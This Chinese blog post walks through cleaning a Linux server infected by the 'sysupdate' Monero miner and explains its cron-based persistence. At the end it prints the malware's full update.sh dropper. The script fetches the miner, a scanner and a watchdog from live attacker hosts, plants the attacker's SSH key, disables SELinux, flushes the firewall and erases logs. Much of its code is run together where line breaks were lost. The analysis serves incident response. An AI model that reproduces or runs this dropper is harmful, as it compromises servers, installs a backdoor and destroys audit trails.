Linux挖矿病毒的清除与分析

清除过程

确定病因

这个病毒还不是算很变态，很多挖矿病毒，使用top命令都看不到挖矿程序的进程。

基本可以确定这个占据绝大部分cpu资源的进程sysupdate，就是挖矿程序了，我们需要先找到他。

使用命令：

ps -aux | grep sysupdate

查看病毒的PID号。

为了获取绝对路径，使用：

ls -l /proc/{pid号}/exe

发现sysupdate的绝对路径在/etc/sysupdate。

下载下来，上传到VirusTotal。

如图所示，就是他，挖矿病毒没跑了。

开始清除

首先干掉进程：kill -9 {pid号}

直接rm -f sysupdate会提示类似：

rm: cannot remove 'sysupdate ': Operation not permitted

基于经验，应该是病毒使用了chattr +i的命令。我们只要先执行chattr -i sysupdate，然后就可以正常删除了。

复发

然后..很快就又被创建出来了。应该是有守护进程什么的。

而且如果我们简单分析一下sysupdate，其实他并不是病毒，他只是个XMR挖矿程序。

(懂我意思吧，我们必须得找到他爸爸)。

分析的方法，可以通过findStr、IDA等工具提串或者..运行一下就明白了。下图是我虚拟机运行的截图。

好，我知道大家都不关心这个。

定时任务

我是先去看了下日志..发现什么都没有Orz，应该是被清了。

那还是先来检查下定时任务吧：

crontab -l或者cat /var/spool/cron/root

还可以去查看定时任务的日志。

more /var/log/cron log

太多的话，可以在后面加上| grep -v {要排除的关键字}来排除无用信息。

update.sh分析

找到了这个定时执行的源头，我们来简单分析一下。update.sh的内容和相关样本在文末有提供下载。

在/etc下下载了config.json（挖矿配置）、sysupdate（XMR挖矿软件）、update.sh（本脚本）、networkservice(scanner 扫描并入侵其他的主机)、sysguard(watchdog 用于监控并保证病毒的正常运行以及更新)并保证他们以root权限运行。

干掉别的挖矿病毒（见kill_miner_proc函数）。

创建/root/.ssh/authorized_keys，添加病毒作者自己的公钥，保证其可以使用SSH登录到服务器，算是个后门吧。

然后就是添加定时任务，为文件添加chattr +i，修改IPTABLES，清楚日志，关闭SELinux等等。

修复

1.rm /var/spool/cron/root或者 crontab -r删除定时任务。

2.kill命令将相关进程干掉，用chattr -i和rm命令，将上述/etc下的文件全部删除。

3./root/.ssh/authorized_keys也删掉或者修复。

至于IPTABLES、SELinux的恢复，就看大家自己的需求了。

附上定时脚本

#!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="854364"
sh_url="https://de.gsearch.com.de/api/update.sh"
sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
config_url="https://de.gsearch.com.de/api/config.json"
config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
config_size="4954"
scan_url="https://de.gsearch.com.de/api/networkservice"
scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
scan_size="2584072"
watchdog_url="https://de.gsearch.com.de/api/sysguard"
watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
watchdog_size="1929480"kill_miner_proc()
{ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9ps ax|grep -o './[0-9]* -c'| xargs pkill -fpkill -f biosetjenkinspkill -f Loopbackpkill -f apacehapkill -f cryptonightpkill -f stratumpkill -f mixnerdxpkill -f performedlpkill -f JnKihGjnpkill -f irqba2anc1pkill -f irqba5xnc1pkill -f irqbnc1pkill -f ir29xc1pkill -f connspkill -f irqbalancepkill -f crypto-poolpkill -f minexmrpkill -f XJnRjpkill -f mgwslpkill -f pythnopkill -f jweripkill -f lx26pkill -f NXLAipkill -f BI5zjpkill -f askdljlqwpkill -f minerdpkill -f minergatepkill -f Guard.shpkill -f ysaydhpkill -f bonnspkill -f donnspkill -f kxjdpkill -f Duck.shpkill -f bonn.shpkill -f conn.shpkill -f kworker34pkill -f kw.shpkill -f pro.shpkill -f polkitdpkill -f acpidpkill -f icb5opkill -f nopxipkill -f irqbalanc1pkill -f minerdpkill -f i586pkill -f gddrpkill -f mstxmrpkill -f ddg.2011pkill -f wnTKYgpkill -f deamonpkill -f disk_geniuspkill -f sourplumpkill -f polkitdpkill -f nanoWatchpkill -f zigwpkill -f devtoolpkill -f systemctIpkill -f WmiPrwSepkill -f sysguardpkill -f sysupdatepkill -f networkservicecrontab -rrm -rf /var/spool/cron/*
}
downloads()
{if [ -f "/usr/bin/curl" ]then echo $1,$2http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencurl --connect-timeout 10 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencurl --connect-timeout 10 --retry 100 $1 > $2elsecurl --connect-timeout 10 --retry 100 $3 > $2fielif [ -f "/usr/bin/cur" ]thenhttp_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`if [ "$http_code" -eq "200" ]thencur --connect-timeout 10 --retry 100 $1 > $2elif [ "$http_code" -eq "405" ]thencur --connect-timeout 10 --retry 100 $1 > $2elsecur --connect-timeout 10 --retry 100 $3 > $2fielif [ -f "/usr/bin/wget" ]thenwget --timeout=10 --tries=100 -O $2 $1if [ $? -ne 0 ]thenwget --timeout=10 --tries=100 -O $2 $3fielif [ -f "/usr/bin/wge" ]thenwge --timeout=10 --tries=100 -O $2 $1if [ $? -eq 0 ]thenwge --timeout=10 --tries=100 -O $2 $3fifi
}kill_sus_proc()
{ps axf -o "pid"|while read prociddols -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fifidoneps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddocat /proc/$procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fidone
}kill_miner_proc
kill_sus_procif [ -f "$rtdir" ]
thenecho "i am root"echo "goto 1" >> /etc/sysupdatechattr -i /etc/sysupdate*chattr -i /etc/config.json*chattr -i /etc/update.sh*chattr -i /root/.ssh/authorized_keys*chattr -i /etc/networkserviceif [ ! -f "/usr/bin/crontab" ]then echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}else[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -fichmod 700 /root/.ssh/echo >> /root/.ssh/authorized_keyschmod 600 root/.ssh/authorized_keysecho "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keyscfg="/etc/config.json"file="/etc/sysupdate"if [-f "/etc/config.json" ]thenfilesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`if [ "$filesize_config" -ne "$config_size" ]    thenpkill -f sysupdaterm /etc/config.jsondownloads $config_url /etc/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /etc/config.json $config_url_backupfiif [ -f "/etc/sysupdate" ]thenfilesize1=`ls -l /etc/sysupdate | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f sysupdaterm /etc/sysupdatedownloads $miner_url /etc/sysupdate $miner_url_backupelseecho "not need download"fielsedownloads $miner_url /etc/sysupdate $miner_url_backupfiif [ -f "/etc/sysguard" ]thenfilesize1=`ls -l /etc/sysguard | awk '{ print $5 }'`if [ "$filesize1" -ne "$watchdog_size" ] thenpkill -f sysguardrm /etc/sysguarddownloads $watchdog_url /etc/sysguard $watchdog_url_backupelseecho "not need download"fielsedownloads $watchdog_url /etc/sysguard $watchdog_url_backupfidownloads $sh_url /etc/update.sh $sh_url_backupif [ -f "/etc/networkservice" ]thenfilesize2=`ls -l /etc/networkservice | awk '{ print $5 }'`if [ "$filesize2" -ne "$scan_size" ] thenpkill -f networkservicerm /etc/networkservicedownloads  $scan_url /etc/networkservice $scan_url_backupelseecho "not need download"fielsedownloads $scan_url /etc/networkservice $scan_url_backupfichmod 777 /etc/sysupdateps -fe|grep sysupdate |grep -v grepif [ $? -ne 0 ]thencd /etcecho "not root runing"sleep 5s./sysupdate &elseecho "root runing....."fichmod 777 /etc/networkserviceps -fe|grep networkservice |grep -v grepif [ $? -ne 0 ]thencd /etcecho "not roots runing"sleep 5s./networkservice &elseecho "roots runing....."fichmod 777 /etc/sysguardps -fe|grep sysguard |grep -v grepif [ $? -ne 0 ]thenecho "not tmps runing"cd /etcchmod 777 sysguardsleep 5s./sysguard &elseecho "roots runing....."fichmod 777 /etc/sysupdatechattr +i /etc/sysupdatechmod 777 /etc/networkservicechattr +i /etc/networkservicechmod 777 /etc/config.jsonchattr +i /etc/config.jsonchmod 777 /etc/update.shchattr +i /etc/update.shchmod 777 /root/.ssh/authorized_keyschattr +i /root/.ssh/authorized_keys
elseecho "goto 1" > /tmp/sysupdateschattr -i /tmp/sysupdate*chattr -i /tmp/networkservicechattr -i /tmp/config.json*chattr -i /tmp/update.sh*if [ ! -f "/usr/bin/crontab" ]then echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> ${crondir}else[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -fiif [ -f "/tmp/config.json" ]thenfilesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`if [ "$filesize1" -ne "$config_size" ]thenpkill -f sysupdaterm /tmp/config.jsondownloads  $config_url /tmp/config.json $config_url_backupelseecho "no need download"fielsedownloads $config_url /tmp/config.json $config_url_backupfiif [ -f "/tmp/sysupdate" ]then    filesize1=`ls -l /tmp/sysupdate | awk '{ print $5 }'`if [ "$filesize1" -ne "$miner_size" ] thenpkill -f sysupdaterm /tmp/sysupdatedownloads $miner_url /tmp/sysupdate $miner_url_backupelseecho "no need download"fielsedownloads $miner_url /tmp/sysupdate $miner_url_backupfiif [ -f "/tmp/sysguard" ]thenfilesize1=`ls -l /tmp/sysguard | awk '{ print $5 }'`if [ "$filesize1" -ne "$watchdog_size" ] thenpkill -f sysguardrm /tmp/sysguarddownloads $watchdog_url /tmp/sysguard $watchdog_url_backupelseecho "not need download"fielsedownloads $watchdog_url /tmp/sysguard $watchdog_url_backupfiecho "i am here"downloads $sh_url /tmp/update.sh $sh_url_backupif [ -f "/tmp/networkservice" ]then filesize2=`ls -l /tmp/networkservice | awk '{ print $5 }'`if [ "$filesize2" -ne "$scan_size" ]  thenpkill -f networkservicerm /tmp/networkservicedownloads $scan_url /tmp/networkservice $scan_url_backupelseecho "no need download"fielsedownloads $scan_url /tmp/networkservice $scan_url_backupfips -fe|grep sysupdate |grep -v grepif [ $? -ne 0 ]thenecho "not tmp runing"cd /tmpchmod 777 sysupdatesleep 5s./sysupdate &elseecho "tmp runing....."fips -fe|grep networkservice |grep -v grepif [ $? -ne 0 ]thenecho "not tmps runing"cd /tmpchmod 777 networkservicesleep 5s./networkservice &elseecho "tmps runing....."fips -fe|grep sysguard |grep -v grepif [ $? -ne 0 ]thenecho "not tmps runing"cd /tmpchmod 777 sysguardsleep 5s./sysguard &elseecho "tmps runing....."fichmod 777 /tmp/sysupdatechattr +i /tmp/sysupdatechmod 777 /tmp/networkservicechattr +i /tmp/networkservicechmod 777 /tmp/sysguardchattr +i /tmp/sysguardchmod 777 /tmp/update.shchattr +i /tmp/update.shchmod 777 /tmp/config.jsonchattr +i /tmp/config.jsonfi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history